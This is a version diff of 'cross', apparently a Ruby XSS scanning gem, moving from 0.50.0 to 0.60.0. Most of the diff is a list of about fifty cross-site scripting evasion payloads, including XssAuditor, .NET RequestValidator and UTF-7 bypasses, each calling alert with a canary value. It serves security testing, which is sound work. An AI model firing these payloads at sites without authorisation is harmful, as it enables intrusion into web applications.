cross 0.50.0 → 0.60.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (5) hide show
  1. checksums.yaml +4 -4
  2. data/lib/cross/engine.rb +9 -5
  3. data/lib/cross/version.rb +1 -1
  4. data/lib/cross/xss.rb +61 -59
  5. metadata +1 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA1:
3
- metadata.gz: 72b79605b86769c7845420cf772fe7e5ca4251c9
4
- data.tar.gz: de0ec4524597cd129cd1957bdca99587b743f0fa
3
+ metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
4
+ data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
5
5
  SHA512:
6
- metadata.gz: 4164f2710605496b67199f45f03f4b680c3926909f949b825f16b6a799534afca8c56496275c1d5f5e9a80139268ca0e90e2d189367981c14c64920732441c29
7
- data.tar.gz: 8cec8b9fb129209cdf5266b5e046bff9265f06aec82c68dc00c8bb0727a259ca2715bfbfd94790d62356d160ed347efa9a3ee44ff30aeb0f13a2efce9726ec36
6
+ metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
7
+ data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6
data/lib/cross/engine.rb CHANGED
@@ -75,8 +75,8 @@ module Cross
75
75
 
76
76
  scripts = page.search("//script")
77
77
  scripts.each do |sc|
78
- $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert('cross canary')")
79
- return true if sc.children.text.include?("alert('cross canary')")
78
+ $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
79
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
80
80
  end
81
81
 
82
82
  return false if options[:oneshot]
@@ -115,8 +115,6 @@ module Cross
115
115
  ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
116
116
  ff.value = pattern if ff.name==options[:parameter_to_tamper]
117
117
 
118
-
119
- # promo=Promo1&codice=&nome=&cognome=&indirizzo=%3Cscript%3Ealert%28%27cross+canary%27%29%3C%2Fscript%3E&comune=&CAP=&provincia=&num1=&num2=&mail=&codfisc=&fase=1
120
118
  end
121
119
  end
122
120
 
@@ -126,7 +124,13 @@ module Cross
126
124
  $logger.err "Page is empty" if pp.body.empty?
127
125
  scripts = pp.search("//script")
128
126
  scripts.each do |sc|
129
- return true if sc.children.text.include?("alert('cross canary')")
127
+ return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
128
+ end
129
+
130
+ # This is for input html field javascript event evasion
131
+ inputs = pp.search("//input")
132
+ inputs.each do |input|
133
+ return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
130
134
  end
131
135
  end
132
136
  return false if options[:oneshot]
data/lib/cross/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module Cross
2
- VERSION = "0.50.0"
2
+ VERSION = "0.60.0"
3
3
  end
data/lib/cross/xss.rb CHANGED
@@ -2,69 +2,71 @@ module Cross
2
2
  module Attack
3
3
  class XSS
4
4
 
5
+ CANARY = 666
6
+
5
7
  def self.each
6
8
 
7
9
  evasions = [
8
- "<script>alert('cross canary')</script>",
9
- "<script>alert('cross canary');</script>",
10
- "/--><script>alert('cross canary')</script>",
11
- "/--><script>alert('cross canary');</script>",
12
- "/--></ScRiPt><ScRiPt>alert('cross canary')</ScRiPt>",
13
- "/--></ScRiPt><ScRiPt>alert('cross canary');</ScRiPt>",
14
- "//;-->alert('cross canary')",
15
- "//;-->alert('cross canary');",
16
- "\"//;\nalert('cross canary')",
17
- "\"//;\nalert('cross canary');",
18
- " onmouseover=alert('1');",
10
+ "a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
11
+ "<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
12
+ "<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
13
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY})</script>",
14
+ "/--><script>alert(#{Cross::Attack::XSS::CANARY});</script>",
15
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY})</ScRiPt>",
16
+ "/--></ScRiPt><ScRiPt>alert(#{Cross::Attack::XSS::CANARY});</ScRiPt>",
17
+ "//;-->alert(#{Cross::Attack::XSS::CANARY})",
18
+ "//;-->alert(#{Cross::Attack::XSS::CANARY});",
19
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY})",
20
+ "\"//;\nalert(#{Cross::Attack::XSS::CANARY});",
19
21
  # more exotic vectors (antisnatchor's collection)
20
- "<script/anyjunk>alert('cross canary')</script>",
21
- "<<script>alert('cross canary');//<</script>",
22
- "<img onerror=alert('cross canary') src=a>",
23
- "<xml onreadystatechange=alert('cross canary')>",
24
- "<style onreadystatechange=alert('cross canary')>",
25
- "<iframe onreadystatechange=alert('cross canary')>",
26
- "<object onerror=alert('cross canary')>",
27
- "<object type=image src=/images/live.gif onreadystatechange=alert('cross canary')></object>",
28
- "<img type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
29
- "<input type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
30
- "<isindex type=image src=/images/live.gif onreadystatechange=alert('cross canary')>",
31
- "<script onreadystatechange=alert('cross canary')>",
32
- "<bgsound onpropertychange=alert('cross canary')>",
33
- "<body onbeforeactivate=alert('cross canary')>",
34
- "<body onfocusin=alert('cross canary')>",
35
- "<input autofocus onfocus=alert('cross canary')>",
36
- "<input onblur=alert('cross canary') autofocus><input autofocus>",
37
- "<body onscroll=alert('cross canary')><br><br>...<br><input autofocus>",
38
- "</a onmousemove=alert('cross canary')>",
39
- "<video src=1 onerror=alert('cross canary')>",
40
- "<audio src=1 onerror=alert('cross canary')>",
41
- "<object data=javascript:alert('cross canary')>",
42
- "<iframe src=javascript:alert('cross canary')>",
43
- "<embed src=javascript:alert('cross canary')>",
44
- "<form id=test /><button form=test formaction=javascript:alert('cross canary')>",
45
- "<event-source src=javascript:alert('cross canary')>",
46
- "<x style=behavior:url(#default#time2) onbegin=alert('cross canary')>",
47
- "<x style=x:expression(alert('cross canary'))>",
48
- "<x onclick=alert('cross canary') src=a>Click here</x>",
49
- "<img onerror=\"alert('cross canary')\"src=a>",
50
- "<img onerror=`alert('cross canary')`src=a>",
51
- "<img/onerror=\"alert('cross canary')\"src=a>",
52
- "<img onerror=a&#x6c;ert('cross canary') src=a>",
53
- "<img onerror=a&#x06c;ert('cross canary') src=a>",
54
- "<img onerror=a&#x006c;ert('cross canary') src=a>",
55
- "<img onerror=a&#x0006c;ert('cross canary') src=a>",
56
- "<img onerror=a&#108;ert('cross canary') src=a>",
57
- "<img onerror=a&#0108;ert('cross canary') src=a>",
58
- "<img onerror=a&#0108;ert('cross canary') src=a>",
59
- "<img onerror=a&#108ert('cross canary') src=a>",
60
- "<img onerror=a&#0108ert('cross canary') src=a>",
61
- "<script>function::['alert']('cross canary')</script>",
62
- "<svg><script>//&#x0A;alert('cross canary')</script>", #Chrome <= 18 XssAuditor bypass
63
- "<script>/*///*/alert('cross canary');</script>", #Chrome <= 20 XssAuditor bypass
64
- "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('cross canary'))>", #.NET RequestValidator bypass
65
- "+ADw-script+AD4-alert('cross canary')+ADw-/script+AD4-", # UTF-7
66
- "},alert('cross canary'),function x(){//", # DOM breaker
67
- "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert('cross canary')\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
22
+ "<script/anyjunk>alert(#{Cross::Attack::XSS::CANARY})</script>",
23
+ "<<script>alert(#{Cross::Attack::XSS::CANARY});//<</script>",
24
+ "<img onerror=alert(#{Cross::Attack::XSS::CANARY}) src=a>",
25
+ "<xml onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
26
+ "<style onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
27
+ "<iframe onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
28
+ "<object onerror=alert(#{Cross::Attack::XSS::CANARY})>",
29
+ "<object type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})></object>",
30
+ "<img type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
31
+ "<input type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
32
+ "<isindex type=image src=/images/live.gif onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
33
+ "<script onreadystatechange=alert(#{Cross::Attack::XSS::CANARY})>",
34
+ "<bgsound onpropertychange=alert(#{Cross::Attack::XSS::CANARY})>",
35
+ "<body onbeforeactivate=alert(#{Cross::Attack::XSS::CANARY})>",
36
+ "<body onfocusin=alert(#{Cross::Attack::XSS::CANARY})>",
37
+ "<input autofocus onfocus=alert(#{Cross::Attack::XSS::CANARY})>",
38
+ "<input onblur=alert(#{Cross::Attack::XSS::CANARY}) autofocus><input autofocus>",
39
+ "<body onscroll=alert(#{Cross::Attack::XSS::CANARY})><br><br>...<br><input autofocus>",
40
+ "</a onmousemove=alert(#{Cross::Attack::XSS::CANARY})>",
41
+ "<video src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
42
+ "<audio src=1 onerror=alert(#{Cross::Attack::XSS::CANARY})>",
43
+ "<object data=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
44
+ "<iframe src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
45
+ "<embed src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
46
+ "<form id=test /><button form=test formaction=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
47
+ "<event-source src=javascript:alert(#{Cross::Attack::XSS::CANARY})>",
48
+ "<x style=behavior:url(#default#time2) onbegin=alert(#{Cross::Attack::XSS::CANARY})>",
49
+ "<x style=x:expression(alert(#{Cross::Attack::XSS::CANARY}))>",
50
+ "<x onclick=alert(#{Cross::Attack::XSS::CANARY}) src=a>Click here</x>",
51
+ "<img onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
52
+ "<img onerror=`alert(#{Cross::Attack::XSS::CANARY})`src=a>",
53
+ "<img/onerror=\"alert(#{Cross::Attack::XSS::CANARY})\"src=a>",
54
+ "<img onerror=a&#x6c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
55
+ "<img onerror=a&#x06c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
56
+ "<img onerror=a&#x006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
57
+ "<img onerror=a&#x0006c;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
58
+ "<img onerror=a&#108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
59
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
60
+ "<img onerror=a&#0108;ert(#{Cross::Attack::XSS::CANARY}) src=a>",
61
+ "<img onerror=a&#108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
62
+ "<img onerror=a&#0108ert(#{Cross::Attack::XSS::CANARY}) src=a>",
63
+ "<script>function::['alert'](#{Cross::Attack::XSS::CANARY})</script>",
64
+ "<svg><script>//&#x0A;alert(#{Cross::Attack::XSS::CANARY})</script>", #Chrome <= 18 XssAuditor bypass
65
+ "<script>/*///*/alert(#{Cross::Attack::XSS::CANARY});</script>", #Chrome <= 20 XssAuditor bypass
66
+ "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert(#{Cross::Attack::XSS::CANARY}))>", #.NET RequestValidator bypass
67
+ "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
68
+ "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
69
+ "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
68
70
  ]
69
71
  evasions.each do |pattern|
70
72
  yield pattern if block_given?
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: cross
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.50.0
4
+ version: 0.60.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - Paolo Perego